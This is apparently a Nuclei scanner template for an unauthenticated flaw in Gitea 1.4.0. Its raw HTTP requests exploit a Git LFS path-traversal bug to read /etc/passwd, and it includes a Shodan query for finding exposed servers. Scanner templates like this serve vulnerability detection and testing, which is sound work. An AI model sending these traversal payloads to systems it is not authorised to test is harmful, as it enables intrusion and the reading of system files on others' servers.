64 lines
1.8 KiB
YAML
64 lines
1.8 KiB
YAML
id: gitea-rce
|
|
|
|
info:
|
|
name: Gitea 1.4.0 - Remote Code Execution
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
Gitea 1.4.0 is vulnerable to remote code execution.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/44996
|
|
- https://github.com/kacperszurek/exploits/blob/master/Gitea/gitea_lfs_rce.py
|
|
classification:
|
|
cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 3
|
|
vendor: gitea
|
|
product: gitea
|
|
shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"'
|
|
tags: gitea,rce,unauth,edb
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /api/v1/repos/search?limit=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /{{repo}}.git/info/lfs/objects HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
Accept: application/vnd.git-lfs+json
|
|
|
|
{
|
|
"Oid": "....../../../etc/passwd",
|
|
"Size": 1000000,
|
|
"User" : "{{randstr}}",
|
|
"Password" : "{{randstr}}",
|
|
"Repo" : "{{randstr}}",
|
|
"Authorization" : "{{randstr}}"
|
|
}
|
|
- |
|
|
GET /{{repo}}.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body_3
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: word
|
|
part: header_3
|
|
words:
|
|
- "application/octet-stream"
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: repo
|
|
group: 1
|
|
regex:
|
|
- '"name":".*","full_name":"(.*)","description"'
|
|
internal: true
|
|
# digest: 4a0a00473045022100e6535e2beccabe9f5e98a70a727d618153f63928b80da833407c6f6a93a3ceef022011ab10769dbed5f1af3b12849f603e2fd7650f2d3bf545bfbf6668bf4d88b835:922c64590222798bb761d5b6d8e72950 |